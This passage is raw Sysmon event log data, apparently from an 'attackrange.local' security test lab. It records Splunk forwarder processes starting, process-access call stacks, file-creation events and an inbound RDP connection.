Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43351876DADBB18A5D4B1C10B3AC7A5A,SHA256=7E096B1A38111D28CA99385D56BEC1E8B79F4DAFED7E05864CE94AD953AA5A35,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978231Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:50.857{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-54322-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 10341000x80000000000000001049557Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:54.062{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8A26-6151-207A-00000000FC01}6224C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049556Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:54.062{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049555Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:54.062{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049554Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:54.062{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049553Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:54.062{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049552Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:54.062{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-8A26-6151-207A-00000000FC01}6224C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049551Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:54.062{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8A26-6151-207A-00000000FC01}6224C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049550Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:54.047{5EBD8912-8A26-6151-207A-00000000FC01}6224C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000978233Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:55.742{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DC2783A8CBB95587005FE2A85DB32E2,SHA256=A829570A4CE437309F1BD5E05B6A2DF7625CADF3EBDE3B9E60242FDD6D99DABC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049581Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:55.417{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049580Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:55.349{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8A27-6151-227A-00000000FC01}1576C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049579Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:55.349{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8A27-6151-227A-00000000FC01}1576C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049578Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:55.349{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049577Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:55.349{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049576Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:55.349{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049575Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:55.349{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049574Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:55.349{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8A27-6151-227A-00000000FC01}1576C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049573Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:55.335{5EBD8912-8A27-6151-227A-00000000FC01}1576C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049572Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:55.133{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA348E803C32E188D19FCA993F441651,SHA256=15861E754A408F14CE3FB1A94311C798624FE76350BCFBEC8D1DBBF933A3043E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049571Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:55.065{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1BFDCA6FC0AD5A59AC7971B72D8E8EBE,SHA256=155A6A29959FF34A4D54C7BF13CA95095D84AD0A554C7D8D0A01DDBDD4E24BCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978235Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:56.758{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8E0AE2C6DFCAD283A1BE9FCFC63EA1C,SHA256=B540C492C236066873980D5757DFD8A53F8F1A66CF514261300CDEB50521C4CC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049592Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:56.388{5EBD8912-8A28-6151-237A-00000000FC01}46364616C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049591Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:56.339{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A781CF5B4D7DBF48BC76473F2C87A003,SHA256=5E857E93705040D4834944A36EB0E7D02513A834624CEEC67636B94A47A708B0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049590Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:56.219{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8A28-6151-237A-00000000FC01}4636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049589Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:56.219{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049588Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:56.219{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049587Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:56.219{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049586Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:56.219{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049585Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:56.219{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8A28-6151-237A-00000000FC01}4636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049584Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:56.219{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8A28-6151-237A-00000000FC01}4636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program 